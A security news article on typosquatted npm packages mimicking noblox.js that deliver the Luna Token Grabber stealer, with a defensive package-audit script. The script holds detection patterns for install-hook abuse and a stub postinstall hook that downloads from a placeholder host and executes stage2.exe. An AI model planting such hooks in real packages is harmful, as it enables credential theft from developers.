More than a dozen malicious packages have been discovered on the npm package repository since the start of August 2023 with capabilities to deploy an open-source information stealer called Luna Token Grabber on systems belonging to Roblox developers.
The ongoing campaign, first detected on August 1 by ReversingLabs, employs modules that masquerade as the legitimate package noblox.js, an API wrapper that’s used to create scripts that interact with the Roblox gaming platform.
The software supply chain security company described the activity as a “replay of an attack uncovered two years ago” in October 2021.
“The malicious packages […] reproduce code from the legitimate noblox.js package but add malicious, information-stealing functions,” software threat researcher Lucija Valentić said in a Tuesday analysis.
The packages were cumulatively downloaded 963 times before they were taken down. The rogue packages and the affected versions are as follows:
- noblox.js-vps (versions 4.14.0 to 4.23.0)
- noblox.js-ssh (versions 4.2.3 to 4.2.5)
- noblox.js-secure (versions 4.1.0, 4.2.0 to 4.2.3)
While the broad contours of the latest attack wave remain similar to the previous one, it also exhibits some unique characteristics of its own, notably in the deployment of an executable that delivers Luna Grabber.
The development is one of the rare instances of a multi-stage infection sequence uncovered on npm, ReversingLabs said.
“With malicious campaigns that target the software supply chain, the difference between sophisticated and unsophisticated attacks often comes down to the level of effort the malicious actors make to disguise their attack and make their malicious packages look legitimate,” Valentić pointed out.
The modules, in particular, cleverly conceal their malicious functionality in a separate file named postinstall.js that’s invoked after installation.
That’s because the genuine noblox.js package also employs a file with the same name to display a thank-you message to its users alongside links to its documentation and GitHub repository.
The bogus variants, on the other hand, use the JavaScript file to check whether the package has been installed on a Windows machine and, if so, download and execute a second-stage payload hosted on Discord's CDN; otherwise, they display an error message.
ReversingLabs said that the second-stage payload continued to evolve with each iteration, progressively adding more functionality and obfuscation mechanisms to thwart analysis. The primary responsibility of the script is to download Luna Token Grabber, a Python tool that can siphon credentials from web browsers as well as Discord tokens.
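The install-hook pattern described above (a lookalike name plus a postinstall script that branches on platform, fetches from the network and spawns a process) is something a registry mirror or CI pre-install check can screen for. The following is an added example written for this article, not code from ReversingLabs or the noblox.js project; it assumes the package's package.json and files have already been extracted from the tarball, the indicator regexes and the protected-name list are constructed heuristics, and the sample packages are constructed stand-ins.

```javascript
// Audit an npm package for a lookalike name and risky install-time hooks.
// Heuristic indicators (assumed): tune thresholds against real package corpora.
const LIFECYCLE_HOOKS = ["preinstall", "install", "postinstall"];
const PROTECTED_NAMES = ["noblox.js"]; // legitimate names worth guarding (assumed list)

const INDICATORS = [
  { id: "platform-check", re: /process\.platform|os\.platform\(\)|["']win32["']/ },
  { id: "child-process",  re: /child_process|\b(exec|execSync|execFile|spawn)\s*\(/ },
  { id: "remote-fetch",   re: /\b(fetch|https?\.get|https?\.request|axios\.get)\s*\(/ },
  { id: "obfuscation",    re: /\beval\s*\(|new Function\s*\(|["']base64["']/ },
];

// Lookalike check: a protected name with an extra suffix ("noblox.js-vps"),
// or the same name with punctuation stripped ("nobloxjs").
function looksLikeTyposquat(name) {
  const norm = (s) => s.toLowerCase().replace(/[^a-z0-9]/g, "");
  return PROTECTED_NAMES.some((legit) => name !== legit &&
    (name.startsWith(legit + "-") || name.startsWith(legit + ".") || norm(name) === norm(legit)));
}

function auditPackage(pkgJson, files) {
  const findings = [];
  if (looksLikeTyposquat(pkgJson.name)) findings.push(`name resembles ${PROTECTED_NAMES.join("/")}`);
  const scripts = pkgJson.scripts || {};
  for (const hook of LIFECYCLE_HOOKS) {
    if (!scripts[hook]) continue;
    findings.push(`${hook} hook: ${scripts[hook]}`);
    // Resolve "node ./x.js" to the file's contents; a missing file cannot be scanned.
    const m = /\bnode\s+(?:\.\/)?(\S+)/.exec(scripts[hook]);
    const body = m && files[m[1]];
    if (!body) continue;
    for (const { id, re } of INDICATORS) if (re.test(body)) findings.push(`${hook} script: ${id}`);
  }
  const hits = findings.filter((f) => / script: /.test(f)).length;
  const suspicious = looksLikeTyposquat(pkgJson.name) || hits >= 2;
  return { name: pkgJson.name, findings, suspicious };
}

// Constructed samples: a benign thank-you hook, and a stub that mirrors the
// described behaviour with a placeholder URL and no real payload.
const BENIGN = {
  pkg: { name: "noblox.js", scripts: { postinstall: "node postinstall.js" } },
  files: { "postinstall.js": 'console.log("Thanks for installing! Docs: https://noblox.js.org");' },
};
const SUSPECT = {
  pkg: { name: "noblox.js-vps", scripts: { postinstall: "node ./postinstall.js" } },
  files: { "postinstall.js": `
    if (process.platform !== "win32") { console.error("Error: unsupported platform"); }
    else { fetch("https://cdn.example.invalid/stage2").then(() => require("child_process").execFile("stage2.exe")); }` },
};
```

Running `auditPackage(SUSPECT.pkg, SUSPECT.files)` flags the lookalike name plus platform-check, remote-fetch and child-process indicators in the postinstall script, while the benign package only reports that a postinstall hook exists.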
However, the threat actor behind the npm campaign appears to have opted only to harvest system information from victims, using a configurable builder made available by the author(s) behind Luna Token Grabber.
This is not the first time Luna Token Grabber has been spotted in the wild. Earlier this June, Trellix disclosed details of a new Go-based information stealer called Skuld that overlaps with the malware strain.
“It highlights yet again the trend of malicious actors using typosquatting as a technique to fool developers into downloading malicious code under the guise of similarly named, legitimate packages,” Valentić said.